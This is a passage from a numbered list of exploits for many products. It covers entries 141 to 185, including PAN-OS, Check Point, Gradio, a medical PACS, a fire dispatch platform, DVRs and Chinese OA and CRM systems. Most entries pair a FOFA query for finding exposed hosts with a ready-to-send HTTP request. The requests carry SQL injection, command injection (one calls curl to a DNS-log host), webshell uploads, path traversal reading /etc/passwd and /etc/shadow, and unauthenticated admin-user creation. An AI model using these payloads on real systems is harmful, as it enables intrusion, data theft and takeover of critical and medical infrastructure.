GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: authcode=h8g9
Upgrade-Insecure-Requests: 1

141. Fujian Kelixun (福建科立讯) communications command and dispatch management platform ajax_users.php SQL injection
FOFA:body="指挥调度管理平台"
POST /app/ext/ajax_users.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Content-Type: application/x-www-form-urlencoded

dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -

142. CMSV6 vehicle monitoring platform weak password
CVE-2024-29666
FOFA:body="/808gps/"
admin/admin

143. Netis WF2780 v2.1.40144 remote command execution
CVE-2024-25850
FOFA:title='AP setup' && header='netis'
PAYLOAD

144. D-Link nas_sharing.cgi command injection
FOFA:app="D_Link-DNS-ShareCenter"
The system parameter is used to pass the command to be executed
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

145. Palo Alto Networks PAN-OS GlobalProtect command injection
CVE-2024-3400
FOFA:icon_hash="-631559155"
GET /global-protect/login.esp HTTP/1.1
Host: 192.168.30.112:1005
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Connection: close
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
Accept-Encoding: gzip

146. MajorDoMo thumb.php unauthenticated remote code execution
CNVD-2024-02175
FOFA:app="MajordomoSL"
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

147. RaidenMAILD mail server v.4.9.4 path traversal
CVE-2024-32399
FOFA:body="RaidenMAILD"
GET /webeditor/../../../windows/win.ini HTTP/1.1
Host: 127.0.0.1:81
Cache-Control: max-age=0
Connection: close

148. CrushFTP authentication bypass via template injection
CVE-2024-4040
FOFA:body="CrushFTP"
PAYLOAD

149. AJ-Report open-source data dashboard remote command execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

150. AJ-Report 1.4.0 authentication bypass and remote code execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 339

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

151. AJ-Report 1.4.1 pageList SQL injection
FOFA:title="AJ-Report"
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

152. Progress Kemp LoadMaster remote command execution
CVE-2024-1212
LoadMaster <= 7.2.59.2 (GA)
LoadMaster <= 7.2.54.8 (LTSF)
LoadMaster <= 7.2.48.10 (LTS)
FOFA:body="LoadMaster"
JztsczsnOmRvZXNub3RtYXR0ZXI= is the base64 encoding of ';ls;':doesnotmatter
GET /access/set?param=enableapi&value=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
Connection: close
Accept: */*
Accept-Language: en
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
Accept-Encoding: gzip

153. Gradio arbitrary file read
CVE-2024-1561
FOFA:body="__gradio_mode__"
Step 1: request /config to obtain the component ids
http://x.x.x.x/config

Step 2: write the contents of /etc/passwd into a temporary file
POST /component_server HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.15 Ddg/14.1.3
Connection: close
Content-Length: 115
Content-Type: application/json
Accept-Encoding: gzip

{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}

Step 3: access
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd

154. Tianwell (天维尔) fire and rescue operations dispatch platform SQL injection
CVE-2024-3720
FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
Host: x.x.x.x
Content-Length: 106
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://x.x.x.x
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}

155. LyLme Spage (六零导航页) file.php arbitrary file upload
CVE-2024-34982
FOFA:title=="上网导航 - LyLme Spage"
POST /include/file.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Connection: close
Content-Length: 232
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
X-Requested-With: XMLHttpRequest

-----------------------------qttl7vemrsold314zg0f
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/png

<?php phpinfo();unlink(__FILE__);?>
-----------------------------qttl7vemrsold314zg0f--

Access the uploaded file at http://x.x.x.x/files/upload/img_664ab7fd14d2c.php

156. TBK DVR-4104/DVR-4216 OS command injection
CVE-2024-3721
FOFA:"Location: /login.rsp"
·TBK DVR-4104
·TBK DVR-4216
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"

POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 0
Cookie: uid=1
Accept-Encoding: gzip

157. 美特CRM upload.jsp arbitrary file upload
CNVD-2023-06971
FOFA:body="/common/scripts/basic.js"
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Content-Length: 709
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
Upgrade-Insecure-Requests: 1

------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
Content-Type: application/octet-stream

nyhelxrutzwhrsvsrafb
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="key"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="form"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="field"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filetitile"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filefolder"

null
------WebKitFormBoundary1imovELzPsfzp5dN--

http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp
158. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Generator: Masa CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x\'&previewid=1

159. 英飞达 (INFINITT) PACS (medical image archiving and communication system) WebJobUpload arbitrary file upload
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
POST /webservices/WebJobUpload.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Length: 1080
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: text/xml; charset=utf-8
Soapaction: "http://rainier/jobUpload"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<jobUpload xmlns="http://rainier">
<vcode>1</vcode>
<subFolder></subFolder>
<fileName>abcrce.asmx</fileName>
<bufValue>PAYLOAD</bufValue>
</jobUpload>
</soap:Body>
</soap:Envelope>

/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")

160. Sonatype Nexus Repository 3 directory traversal and file read
CVE-2024-4956
FOFA:title="Nexus Repository Manager"
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

161. 科拓 intelligent parking fee collection system Webservice.asmx arbitrary file upload
FOFA:body="/KT_Css/qd_defaul.css"
Step 1: upload the file. The <fileName> field sets the file name and the <fileFlow> field carries the file content, which must be base64-encoded.
POST /Webservice.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 445
Content-Type: text/xml
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<UploadResume xmlns="http://tempuri.org/">
<ip>1</ip>
<fileName>../../../../dizxdell.aspx</fileName>
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
<tag>3</tag>
</UploadResume>
</soap:Body>
</soap:Envelope>

http://x.x.x.x/dizxdell.aspx
162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
FOFA: app="和丰山海-数字标牌"
POST /QH.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 583
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
Accept-Encoding: gzip

------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
Content-Type: application/octet-stream

<% response.write("ujidwqfuuqjalgkvrpqy") %>
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="action"

upload
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="responderId"

ResourceNewResponder
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="remotePath"

/opt/resources
------WebKitFormBoundaryeegvclmyurlotuey--

http://x.x.x.x/opt/resources/kjuhitjgk.aspx
163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
FOFA: icon_hash="-795291075"
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 293
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod

------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="name"

1.php
------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: image/jpeg

rvjhvbhwwuooyiioxega
------iiqvnofupvhdyrcoqyuujyetjvqgocod--

164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
FOFA: title="智慧综合管理平台登入"
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Content-Length: 288
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

------dqdaieopnozbkapjacdbdthlvtlyl
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
Content-Type: image/jpeg

<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
------dqdaieopnozbkapjacdbdthlvtlyl--

http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx

165. OrangeHRM 3.3.3 SQL injection
CVE-2024-36428
FOFA: app="OrangeHRM-产品"
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))

166. 中成科信 ticketing management platform SeatMapHandler SQL injection
FOFA:body="技术支持:北京中成科信科技发展有限公司"
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
Host:
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 89

Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE

167. 精益 value management system DownLoad.aspx arbitrary file read
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


168. 宏景EHR OutputCode arbitrary file read
FOFA:app="HJSOFT-HCM"
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close


169. 宏景EHR downlawbase SQL injection
FOFA:app="HJSOFT-HCM"
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close


170. 宏景EHR DisplayExcelCustomReport arbitrary file read
FOFA:body="/general/sys/hjaxmanage.js"
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
Host: balalanengliang
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

filename=../webapps/ROOT/WEB-INF/web.xml

171. 通天星 CMSV6 vehicle positioning and monitoring platform SQL injection
FOFA:body="/808gps/"
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close


172. DT HD license plate recognition camera arbitrary file read
FOFA:app="DT-高清车牌识别摄像机"
GET /../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


173. Check Point security gateway arbitrary file read
CVE-2024-24919
FOFA:app="Check_Point-SSL-Network-Extender"
POST /clients/MyCRL HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

aCSHELL/../../../../../../../etc/shadow

174. 金和OA C6 FileDownLoad.aspx arbitrary file read
FOFA:app="金和网络-金和OA"
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close


175. 金和OA C6 IncentivePlanFulfill.aspx SQL injection
FOFA:app="金和网络-金和OA"
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

176. Telecom gateway configuration management system rewrite.php file upload
FOFA:body="img/login_bg3.png" && body="系统登录"
POST /manager/teletext/material/rewrite.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
Connection: close

------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
Content-Type: image/png

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="uploadtime"


------WebKitFormBoundaryOKldnDPT--

177. H3C router sensitive information disclosure
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../M60.cfg
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg

178. H3C campus network self-service system flexFileUpload arbitrary file upload
FOFA:header="/selfservice"
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Content-Length: 252
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l

-----------------aqutkea7vvanpqy3rh2l
Content-Disposition: form-data; name="12234.txt"; filename="12234"
Content-Type: application/octet-stream
Content-Length: 255

12234
-----------------aqutkea7vvanpqy3rh2l--

GET /imc/primepush/%2e%2e/flex/12234.txt

179. 建文 engineering management system arbitrary file read
POST /Common/DownLoad2.aspx HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

path=../log4net.config&Name=

180. 帮管客 CRM jiliyu SQL injection
FOFA:app="帮管客-CRM"
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

181. 润申信息科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20

182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

username=test1234&pwd=test1234&savedays=1

183. 广州图创 (Interlib) library cluster management system updOpuserPw SQL injection
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

184. 迅饶科技 X2Modbus gateway AddUser arbitrary user addition
FOFA:server="SunFull-Webs"
POST /soap/AddUser HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/xml, text/xml, */*; q=0.01
Content-Type: text/xml; charset=utf-8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Requested-With: XMLHttpRequest

insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')

185. 瑞友天翼 application virtualization system SQL injection
version < 7.0.5.1
FOFA:app="REALOR-天翼应用虚拟化系统"
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
Host: host

